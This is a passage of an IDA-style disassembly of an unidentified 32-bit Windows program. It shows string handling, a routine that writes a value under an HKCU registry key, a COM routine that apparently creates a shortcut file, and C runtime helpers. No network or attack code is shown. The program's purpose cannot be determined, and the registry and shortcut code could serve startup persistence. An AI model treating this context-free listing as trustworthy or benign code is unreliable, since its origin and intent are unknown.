push eax ; BSTR
call ds:SysStringLen
mov esi, eax
loc_40AB4C: ; CODE XREF: sub_40AA70+D1�j
add ebx, esi
push ebx ; ui
push 0 ; strIn
mov [ebp+var_10], ebx
call ds:SysAllocStringLen
mov ebx, eax
test ebx, ebx
jz short loc_40ABA7
lea eax, [esi+esi]
mov esi, [edi]
mov ecx, eax
mov edi, ebx
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [ebp+var_8]
mov esi, [ebp+var_C]
add ecx, ecx
lea edi, [eax+ebx]
mov edx, ecx
mov eax, [ebp+var_10]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov esi, [ebp+var_4]
mov word ptr [ebx+eax*2], 0
mov ecx, [esi]
push ecx ; bstrString
call ds:SysFreeString
mov [esi], ebx
loc_40ABA7: ; CODE XREF: sub_40AA70+EE�j
mov edx, [ebp+lpMem]
push edx ; lpMem
call sub_40AF10
add esp, 4
mov al, 1
lea esp, [ebp-1Ch]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_40AA70 endp
; ---------------------------------------------------------------------------
align 4
off_40ABC4 dd offset loc_40AAD5 ; DATA XREF: sub_40AA70+5E�r
dd offset loc_40AAEB ; jump table for switch statement
byte_40ABCC db 0, 1, 1, 0 ; DATA XREF: sub_40AA70+58�r
db 1, 0, 0, 1 ; indirect table for switch statement
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 1
db 0, 1, 0
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40ABF0(LPCSTR lpSubKey,LPCSTR lpValueName,HKEY hKey)
sub_40ABF0 proc near ; CODE XREF: sub_4099D0+103�p
; sub_4099D0+11B�p
lpSubKey = dword ptr 4
lpValueName = dword ptr 8
hKey = dword ptr 0Ch
mov al, byte ptr [esp+hKey]
push ebx
mov ebx, ds:RegOpenKeyExA
push ebp
mov ebp, [esp+8+lpValueName]
push esi
push edi
mov edi, [esp+10h+lpSubKey]
test al, al
mov esi, ecx
jnz short loc_40AC64
lea eax, [esp+10h+hKey]
push eax ; phkResult
push 20019h ; samDesired
push 0 ; ulOptions
push edi ; lpSubKey
push 80000001h ; hKey
call ebx ; RegOpenKeyExA
test eax, eax
jz short loc_40AC2D
pop edi
pop esi
pop ebp
xor al, al
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_40AC2D: ; CODE XREF: sub_40ABF0+32�j
mov ecx, [esp+10h+hKey]
push 0 ; lpcbData
push 0 ; lpData
push 0 ; lpType
push 0 ; lpReserved
push ebp ; lpValueName
push ecx ; hKey
call ds:RegQueryValueExA ; RegQueryValueExA
test eax, eax
jz short loc_40AC59
mov edx, [esp+10h+hKey]
push edx ; hKey
call ds:RegCloseKey ; RegCloseKey
pop edi
pop esi
pop ebp
xor al, al
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_40AC59: ; CODE XREF: sub_40ABF0+53�j
mov eax, [esp+10h+hKey]
push eax ; hKey
call ds:RegCloseKey ; RegCloseKey
loc_40AC64: ; CODE XREF: sub_40ABF0+1A�j
lea ecx, [esp+10h+hKey]
push ecx ; phkResult
push 20006h ; samDesired
push 0 ; ulOptions
push edi ; lpSubKey
push 80000001h ; hKey
call ebx ; RegOpenKeyExA
test eax, eax
jz short loc_40AC85
pop edi
pop esi
pop ebp
xor al, al
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
loc_40AC85: ; CODE XREF: sub_40ABF0+8A�j
mov ecx, esi
call sub_40A2D0
mov edx, eax
or ecx, 0FFFFFFFFh
mov edi, edx
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx ; cbData
push edx ; lpData
mov edx, [esp+18h+hKey]
push 1 ; dwType
push eax ; Reserved
push ebp ; lpValueName
push edx ; hKey
call ds:RegSetValueExA ; RegSetValueExA
test eax, eax
mov eax, [esp+10h+hKey]
push eax ; hKey
setz bl
call ds:RegCloseKey ; RegCloseKey
pop edi
pop esi
mov al, bl
pop ebp
pop ebx
retn 0Ch
sub_40ABF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40ACD0 proc near ; CODE XREF: sub_4039C0+726�p
ppv = dword ptr -210h
var_20C = dword ptr -20Ch
WideCharStr = word ptr -208h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 210h
lea eax, [esp+210h+ppv]
push esi
push eax ; ppv
push offset stru_40D3A8 ; riid
push 1 ; dwClsContext
push 0 ; pUnkOuter
mov esi, ecx
push offset stru_40D228 ; rclsid
call ds:CoCreateInstance
test eax, eax
jge short loc_40AD02
xor al, al
pop esi
add esp, 210h
retn 8
; ---------------------------------------------------------------------------
loc_40AD02: ; CODE XREF: sub_40ACD0+24�j
mov eax, [esp+214h+ppv]
lea edx, [esp+214h+var_20C]
push edx
push offset dword_40D860
mov ecx, [eax]
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_40AD81
mov ecx, esi
call sub_40A2D0
mov esi, eax
push esi ; lpFileName
call sub_40B56A
mov eax, [esp+218h+ppv]
mov edx, [esp+218h+arg_0]
add esp, 4
mov ecx, [eax]
push edx
push eax
call dword ptr [ecx+50h]
mov eax, [esp+214h+ppv]
mov edx, [esp+214h+arg_4]
push edx
push eax
mov ecx, [eax]
call dword ptr [ecx+1Ch]
lea eax, [esp+214h+WideCharStr]
push 104h ; cchWideChar
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push esi ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov eax, [esp+214h+var_20C]
lea edx, [esp+214h+WideCharStr]
push 1
push edx
mov ecx, [eax]
push eax
call dword ptr [ecx+18h]
mov eax, [esp+214h+var_20C]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
loc_40AD81: ; CODE XREF: sub_40ACD0+47�j
mov eax, [esp+214h+ppv]
push eax
mov edx, [eax]
call dword ptr [edx+8]
mov al, 1
pop esi
add esp, 210h
retn 8
sub_40ACD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
public start
start proc near
StartupInfo = _STARTUPINFOA ptr -44h
sub esp, 44h
push ebx
push esi
call ds:GetCommandLineA ; GetCommandLineA
mov ebx, ds:ExitProcess
mov esi, eax
test esi, esi
jnz short loc_40ADBB
push 0FFFFFFFFh ; uExitCode
call ebx ; ExitProcess
; ---------------------------------------------------------------------------
loc_40ADBB: ; CODE XREF: start+15�j
mov al, [esi]
push edi
mov edi, ds:CharNextA
cmp al, 22h
jnz short loc_40ADE3
loc_40ADC8: ; CODE XREF: start+35�j
push esi ; lpsz
call edi ; CharNextA
mov esi, eax
mov al, [esi]
cmp al, 22h
jz short loc_40ADD7
test al, al
jnz short loc_40ADC8
loc_40ADD7: ; CODE XREF: start+31�j
cmp byte ptr [esi], 22h
jnz short loc_40ADF1
push esi ; lpsz
call edi ; CharNextA
mov esi, eax
jmp short loc_40ADF1
; ---------------------------------------------------------------------------
loc_40ADE3: ; CODE XREF: start+26�j
cmp al, 20h
jle short loc_40ADF1
loc_40ADE7: ; CODE XREF: start+4F�j
push esi ; lpsz
call edi ; CharNextA
mov esi, eax
cmp byte ptr [esi], 20h
jg short loc_40ADE7
loc_40ADF1: ; CODE XREF: start+3A�j start+41�j ...
mov al, [esi]
test al, al
jz short loc_40AE06
loc_40ADF7: ; CODE XREF: start+64�j
cmp al, 20h
jg short loc_40AE06
push esi ; lpsz
call edi ; CharNextA
mov esi, eax
mov al, [esi]
test al, al
jnz short loc_40ADF7
loc_40AE06: ; CODE XREF: start+55�j start+59�j
lea eax, [esp+50h+StartupInfo]
mov [esp+50h+StartupInfo.dwFlags], 0
push eax ; lpStartupInfo
call ds:GetStartupInfoA ; GetStartupInfoA
mov al, byte ptr [esp+50h+StartupInfo.dwFlags]
pop edi
test al, 1
jz short loc_40AE2D
mov eax, dword ptr [esp+4Ch+StartupInfo.wShowWindow]
and eax, 0FFFFh
jmp short loc_40AE32
; ---------------------------------------------------------------------------
loc_40AE2D: ; CODE XREF: start+80�j
mov eax, 0Ah
loc_40AE32: ; CODE XREF: start+8B�j
push eax ; int
push esi ; int
push 0 ; int
push 0 ; lpModuleName
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hInstance
call sub_4010C0
push eax ; uExitCode
call ebx ; ExitProcess
start endp
; ---------------------------------------------------------------------------
pop esi
pop ebx
add esp, 44h
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40AE50(SIZE_T dwBytes)
sub_40AE50 proc near ; CODE XREF: sub_404540+13�p
; sub_408E00+2F�p ...
dwBytes = dword ptr 4
mov edx, dwFlags
push esi
test edx, edx
jnz short loc_40AE70
mov eax, [esp+4+dwBytes]
mov ecx, hHeap
push eax ; dwBytes
push edx ; dwFlags
push ecx ; hHeap
call ds:HeapAlloc
pop esi
retn
; ---------------------------------------------------------------------------
loc_40AE70: ; CODE XREF: sub_40AE50+9�j
mov eax, dword_40FB5C
mov ecx, eax
inc eax
mov dword_40FB5C, eax
mov eax, dword_40FB54
and eax, ecx
mov ecx, [esp+4+dwBytes]
add ecx, 8
mov esi, [edx+eax*4]
push ecx ; dwBytes
push 0 ; dwFlags
push esi ; hHeap
call ds:HeapAlloc
test eax, eax
jz short loc_40AEA3
mov [eax], esi
add eax, 8
pop esi
retn
; ---------------------------------------------------------------------------
loc_40AEA3: ; CODE XREF: sub_40AE50+4A�j
xor eax, eax
pop esi
retn
sub_40AE50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40AEB0(LPVOID lpMem,SIZE_T dwBytes)
sub_40AEB0 proc near ; CODE XREF: sub_401620+A1�p
lpMem = dword ptr 4
dwBytes = dword ptr 8
mov eax, [esp+lpMem]
test eax, eax
jnz short loc_40AEC6
mov eax, [esp+dwBytes]
push eax ; dwBytes
call sub_40AE50
add esp, 4
retn
; ---------------------------------------------------------------------------
loc_40AEC6: ; CODE XREF: sub_40AEB0+6�j
mov ecx, dwFlags
test ecx, ecx
jnz short loc_40AEE6
mov ecx, [esp+dwBytes]
mov edx, hHeap
push ecx ; dwBytes
push eax ; lpMem
push 0 ; dwFlags
push edx ; hHeap
call ds:HeapReAlloc
retn
; ---------------------------------------------------------------------------
loc_40AEE6: ; CODE XREF: sub_40AEB0+1E�j
mov ecx, [esp+dwBytes]
mov edx, [eax-8]
add eax, 0FFFFFFF8h
add ecx, 8
push ecx ; dwBytes
push eax ; lpMem
push 0 ; dwFlags
push edx ; hHeap
call ds:HeapReAlloc
test eax, eax
jz short loc_40AF06
add eax, 8
retn
; ---------------------------------------------------------------------------
loc_40AF06: ; CODE XREF: sub_40AEB0+50�j
xor eax, eax
retn
sub_40AEB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40AF10(LPVOID lpMem)
sub_40AF10 proc near ; CODE XREF: sub_4015D0+42�p
; sub_4039C0+89E�p ...
lpMem = dword ptr 4
mov eax, dwFlags
test eax, eax
jnz short loc_40AF2E
mov eax, [esp+lpMem]
mov ecx, hHeap
push eax ; lpMem
push 0 ; dwFlags
push ecx ; hHeap
call ds:HeapFree
retn
; ---------------------------------------------------------------------------
loc_40AF2E: ; CODE XREF: sub_40AF10+7�j
mov edx, [esp+lpMem]
lea eax, [edx-8]
push eax ; lpMem
push 0 ; dwFlags
mov eax, [eax]
push eax ; hHeap
call ds:HeapFree
retn
sub_40AF10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40AF50(SIZE_T dwBytes)
sub_40AF50 proc near ; CODE XREF: sub_4010C0+394�p
; sub_401620+F�p ...
dwBytes = dword ptr 4
mov eax, [esp+dwBytes]
push eax ; dwBytes
call sub_40AE50
add esp, 4
retn
sub_40AF50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40AF60(LPVOID lpMem)
sub_40AF60 proc near ; CODE XREF: sub_4015D0+26�p
; sub_401620+DA�p ...
lpMem = dword ptr 4
mov eax, [esp+lpMem]
push eax ; lpMem
call sub_40AF10
pop ecx
retn
sub_40AF60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40AF70 proc near ; CODE XREF: sub_4010C0+1F0�p
; sub_4010C0+21B�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_40AF90
loc_40AF7C: ; CODE XREF: sub_40AF70+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_40AF7C
loc_40AF90: ; CODE XREF: sub_40AF70+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_40AF70 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40AF9F(UINT uExitCode)
sub_40AF9F proc near ; CODE XREF: sub_4036E0+236�p
uExitCode = dword ptr 4
push 0 ; int
push 0 ; int
push [esp+8+uExitCode] ; uExitCode
call sub_40AFB0
add esp, 0Ch
retn
sub_40AF9F endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40AFB0(UINT uExitCode,int,int)
sub_40AFB0 proc near ; CODE XREF: sub_40AF9F+8�p
uExitCode = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp dword_40FC28, edi
jnz short loc_40AFCD
push [esp+4+uExitCode] ; uExitCode
call ds:GetCurrentProcess ; GetCurrentProcess
push eax ; hProcess
call ds:TerminateProcess ; TerminateProcess
loc_40AFCD: ; CODE XREF: sub_40AFB0+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_40FC24, edi
mov byte_40FC20, bl
jnz short loc_40B021
mov eax, dword_40FC68
test eax, eax
jz short loc_40B010
mov ecx, dword_40FC64
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_40B00F
loc_40AFFC: ; CODE XREF: sub_40AFB0+5D�j
mov eax, [esi]
test eax, eax
jz short loc_40B004
call eax
loc_40B004: ; CODE XREF: sub_40AFB0+50�j
sub esi, 4
cmp esi, dword_40FC68
jnb short loc_40AFFC
loc_40B00F: ; CODE XREF: sub_40AFB0+4A�j
pop esi
loc_40B010: ; CODE XREF: sub_40AFB0+3C�j
push offset dword_40F018
push offset dword_40F014
call sub_40B049
pop ecx
pop ecx
loc_40B021: ; CODE XREF: sub_40AFB0+33�j
push offset dword_40F020
push offset dword_40F01C
call sub_40B049
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_40B047
push [esp+4+uExitCode] ; uExitCode
mov dword_40FC28, edi
call ds:ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
loc_40B047: ; CODE XREF: sub_40AFB0+85�j
pop edi
retn
sub_40AFB0 endp
; =============== S U B R O U T I N E =======================================
sub_40B049 proc near ; CODE XREF: sub_40AFB0+6A�p
; sub_40AFB0+7B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_40B04E: ; CODE XREF: sub_40B049+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_40B061
mov eax, [esi]
test eax, eax
jz short loc_40B05C
call eax
loc_40B05C: ; CODE XREF: sub_40B049+F�j
add esi, 4
jmp short loc_40B04E
; ---------------------------------------------------------------------------
loc_40B061: ; CODE XREF: sub_40B049+9�j
pop esi
retn
sub_40B049 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40B070 proc near ; CODE XREF: sub_4036E0+170�p
; sub_4036E0+1D0�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_40B0F3
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_40B094
shr ecx, 2
jnz short loc_40B101
jmp short loc_40B0B5
; ---------------------------------------------------------------------------
loc_40B094: ; CODE XREF: sub_40B070+1B�j
; sub_40B070+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_40B0C2
test al, al
jz short loc_40B0CA
test esi, 3
jnz short loc_40B094
mov ebx, ecx
shr ecx, 2
jnz short loc_40B101
loc_40B0B0: ; CODE XREF: sub_40B070+8F�j
and ebx, 3
jz short loc_40B0C2
loc_40B0B5: ; CODE XREF: sub_40B070+22�j
; sub_40B070+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_40B0EE
dec ebx
jnz short loc_40B0B5
loc_40B0C2: ; CODE XREF: sub_40B070+2B�j
; sub_40B070+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40B0CA: ; CODE XREF: sub_40B070+2F�j
test edi, 3
jz short loc_40B0E4
loc_40B0D2: ; CODE XREF: sub_40B070+72�j
mov [edi], al
inc edi
dec ecx
jz loc_40B166
test edi, 3
jnz short loc_40B0D2
loc_40B0E4: ; CODE XREF: sub_40B070+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_40B157
loc_40B0EB: ; CODE XREF: sub_40B070+7F�j
; sub_40B070+F4�j
mov [edi], al
inc edi
loc_40B0EE: ; CODE XREF: sub_40B070+4D�j
dec ebx
jnz short loc_40B0EB
pop ebx
pop esi
loc_40B0F3: ; CODE XREF: sub_40B070+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_40B0F9: ; CODE XREF: sub_40B070+A9�j
; sub_40B070+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_40B0B0
loc_40B101: ; CODE XREF: sub_40B070+20�j
; sub_40B070+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_40B0F9
test dl, dl
jz short loc_40B14B
test dh, dh
jz short loc_40B141
test edx, 0FF0000h
jz short loc_40B137
test edx, 0FF000000h
jnz short loc_40B0F9
mov [edi], edx
jmp short loc_40B14F
; ---------------------------------------------------------------------------
loc_40B137: ; CODE XREF: sub_40B070+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_40B14F
; ---------------------------------------------------------------------------
loc_40B141: ; CODE XREF: sub_40B070+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_40B14F
; ---------------------------------------------------------------------------
loc_40B14B: ; CODE XREF: sub_40B070+AD�j
xor edx, edx
mov [edi], edx
loc_40B14F: ; CODE XREF: sub_40B070+C5�j
; sub_40B070+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_40B161
loc_40B157: ; CODE XREF: sub_40B070+79�j
xor eax, eax
loc_40B159: ; CODE XREF: sub_40B070+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_40B159
loc_40B161: ; CODE XREF: sub_40B070+E5�j
and ebx, 3
jnz short loc_40B0EB
loc_40B166: ; CODE XREF: sub_40B070+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_40B070 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B16E(LPCSTR lpPathName)
sub_40B16E proc near ; CODE XREF: sub_4039C0+452�p
lpPathName = dword ptr 4
push 0 ; lpSecurityAttributes
push [esp+4+lpPathName] ; lpPathName
call ds:CreateDirectoryA ; CreateDirectoryA
test eax, eax
jnz short loc_40B186
call ds:GetLastError
jmp short loc_40B188
; ---------------------------------------------------------------------------
loc_40B186: ; CODE XREF: sub_40B16E+E�j
xor eax, eax
loc_40B188: ; CODE XREF: sub_40B16E+16�j
test eax, eax
jz short loc_40B197
push eax
call sub_40B575
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40B197: ; CODE XREF: sub_40B16E+1C�j
xor eax, eax
retn
sub_40B16E endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_40B1B0
loc_40B1A0: ; CODE XREF: sub_40B1B0+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_40B1B0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40B1B0 proc near ; CODE XREF: sub_4051A0+1F1�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 0040B1A0 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_40B1DB
loc_40B1C8: ; CODE XREF: sub_40B1B0+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_40B1A0
test cl, cl
jz short loc_40B224
test edx, 3
jnz short loc_40B1C8
loc_40B1DB: ; CODE XREF: sub_40B1B0+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_40B1E6: ; CODE XREF: sub_40B1B0+61�j
; sub_40B1B0+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_40B228
and eax, 81010100h
jz short loc_40B1E6
and eax, 1010100h
jnz short loc_40B222
and esi, 80000000h
jnz short loc_40B1E6
loc_40B222: ; CODE XREF: sub_40B1B0+68�j
; sub_40B1B0+81�j ...
pop esi
pop edi
loc_40B224: ; CODE XREF: sub_40B1B0+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40B228: ; CODE XREF: sub_40B1B0+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_40B265
test al, al
jz short loc_40B222
cmp ah, bl
jz short loc_40B25E
test ah, ah
jz short loc_40B222
shr eax, 10h
cmp al, bl
jz short loc_40B257
test al, al
jz short loc_40B222
cmp ah, bl
jz short loc_40B250
test ah, ah
jz short loc_40B222
jmp short loc_40B1E6
; ---------------------------------------------------------------------------
loc_40B250: ; CODE XREF: sub_40B1B0+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40B257: ; CODE XREF: sub_40B1B0+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40B25E: ; CODE XREF: sub_40B1B0+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40B265: ; CODE XREF: sub_40B1B0+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_40B1B0 endp
; =============== S U B R O U T I N E =======================================
sub_40B26C proc near ; CODE XREF: sub_405830+1FB�p
; sub_408FC0+168�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40B283
add esp, 10h
retn
sub_40B26C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B283 proc near ; CODE XREF: sub_40B26C+E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
push edi
mov edi, [ebp+arg_0]
mov bl, [edi]
lea esi, [edi+1]
mov [ebp+var_4], esi
loc_40B29B: ; CODE XREF: sub_40B283+46�j
cmp dword_40FAC4, 1
jle short loc_40B2B3
movzx eax, bl
push 8 ; int
push eax ; CharType
call sub_40B6A8
pop ecx
pop ecx
jmp short loc_40B2C2
; ---------------------------------------------------------------------------
loc_40B2B3: ; CODE XREF: sub_40B283+1F�j
mov ecx, off_40F8B8
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 8
loc_40B2C2: ; CODE XREF: sub_40B283+2E�j
test eax, eax
jz short loc_40B2CB
mov bl, [esi]
inc esi
jmp short loc_40B29B
; ---------------------------------------------------------------------------
loc_40B2CB: ; CODE XREF: sub_40B283+41�j
cmp bl, 2Dh
mov [ebp+var_4], esi
jnz short loc_40B2D9
or [ebp+arg_C], 2
jmp short loc_40B2DE
; ---------------------------------------------------------------------------
loc_40B2D9: ; CODE XREF: sub_40B283+4E�j
cmp bl, 2Bh
jnz short loc_40B2E4
loc_40B2DE: ; CODE XREF: sub_40B283+54�j
mov bl, [esi]
inc esi
mov [ebp+var_4], esi
loc_40B2E4: ; CODE XREF: sub_40B283+59�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_40B47B
cmp eax, 1
jz loc_40B47B
cmp eax, 24h
jg loc_40B47B
push 10h
test eax, eax
pop ecx
jnz short loc_40B32C
cmp bl, 30h
jz short loc_40B316
mov [ebp+arg_8], 0Ah
jmp short loc_40B348
; ---------------------------------------------------------------------------
loc_40B316: ; CODE XREF: sub_40B283+88�j
mov al, [esi]
cmp al, 78h
jz short loc_40B329
cmp al, 58h
jz short loc_40B329
mov [ebp+arg_8], 8
jmp short loc_40B348
; ---------------------------------------------------------------------------
loc_40B329: ; CODE XREF: sub_40B283+97�j
; sub_40B283+9B�j
mov [ebp+arg_8], ecx
loc_40B32C: ; CODE XREF: sub_40B283+83�j
cmp [ebp+arg_8], ecx
jnz short loc_40B348
cmp bl, 30h
jnz short loc_40B348
mov al, [esi]
cmp al, 78h
jz short loc_40B340
cmp al, 58h
jnz short loc_40B348
loc_40B340: ; CODE XREF: sub_40B283+B7�j
mov bl, [esi+1]
inc esi
inc esi
mov [ebp+var_4], esi
loc_40B348: ; CODE XREF: sub_40B283+91�j
; sub_40B283+A4�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov edi, 103h
mov [ebp+var_C], eax
loc_40B358: ; CODE XREF: sub_40B283+16C�j
cmp dword_40FAC4, 1
movzx esi, bl
jle short loc_40B370
push 4 ; int
push esi ; CharType
call sub_40B6A8
pop ecx
pop ecx
jmp short loc_40B37B
; ---------------------------------------------------------------------------
loc_40B370: ; CODE XREF: sub_40B283+DF�j
mov eax, off_40F8B8
mov al, [eax+esi*2]
and eax, 4
loc_40B37B: ; CODE XREF: sub_40B283+EB�j
test eax, eax
jz short loc_40B387
movsx ecx, bl
sub ecx, 30h
jmp short loc_40B3B9
; ---------------------------------------------------------------------------
loc_40B387: ; CODE XREF: sub_40B283+FA�j
cmp dword_40FAC4, 1
jle short loc_40B39B
push edi ; int
push esi ; CharType
call sub_40B6A8
pop ecx
pop ecx
jmp short loc_40B3A6
; ---------------------------------------------------------------------------
loc_40B39B: ; CODE XREF: sub_40B283+10B�j
mov eax, off_40F8B8
mov ax, [eax+esi*2]
and eax, edi
loc_40B3A6: ; CODE XREF: sub_40B283+116�j
test eax, eax
jz short loc_40B3F4
movsx eax, bl
push eax ; CharType
call sub_40B5DC
pop ecx
mov ecx, eax
sub ecx, 37h
loc_40B3B9: ; CODE XREF: sub_40B283+102�j
cmp ecx, [ebp+arg_8]
jnb short loc_40B3F4
mov esi, [ebp+var_8]
or [ebp+arg_C], 8
cmp esi, [ebp+var_C]
jb short loc_40B3DE
jnz short loc_40B3D8
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp ecx, edx
jbe short loc_40B3DE
loc_40B3D8: ; CODE XREF: sub_40B283+147�j
or [ebp+arg_C], 4
jmp short loc_40B3E7
; ---------------------------------------------------------------------------
loc_40B3DE: ; CODE XREF: sub_40B283+145�j
; sub_40B283+153�j
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_8], esi
loc_40B3E7: ; CODE XREF: sub_40B283+159�j
mov eax, [ebp+var_4]
inc [ebp+var_4]
mov bl, [eax]
jmp loc_40B358
; ---------------------------------------------------------------------------
loc_40B3F4: ; CODE XREF: sub_40B283+125�j
; sub_40B283+139�j
mov ecx, [ebp+arg_C]
dec [ebp+var_4]
mov edx, [ebp+arg_4]
test cl, 8
jnz short loc_40B412
test edx, edx
jz short loc_40B40C
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_40B40C: ; CODE XREF: sub_40B283+181�j
and [ebp+var_8], 0
jmp short loc_40B45F
; ---------------------------------------------------------------------------
loc_40B412: ; CODE XREF: sub_40B283+17D�j
test cl, 4
mov eax, 7FFFFFFFh
jnz short loc_40B438
test cl, 1
jnz short loc_40B45F
and ecx, 2
jz short loc_40B42F
cmp [ebp+var_8], 80000000h
ja short loc_40B438
loc_40B42F: ; CODE XREF: sub_40B283+1A1�j
test ecx, ecx
jnz short loc_40B45F
cmp [ebp+var_8], eax
jbe short loc_40B45F
loc_40B438: ; CODE XREF: sub_40B283+197�j
; sub_40B283+1AA�j
test byte ptr [ebp+arg_C], 1
mov dword_40FBE0, 22h
jz short loc_40B44E
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_40B45F
; ---------------------------------------------------------------------------
loc_40B44E: ; CODE XREF: sub_40B283+1C3�j
mov ecx, [ebp+arg_C]
and cl, 2
neg cl
sbb ecx, ecx
neg ecx
add ecx, eax
mov [ebp+var_8], ecx
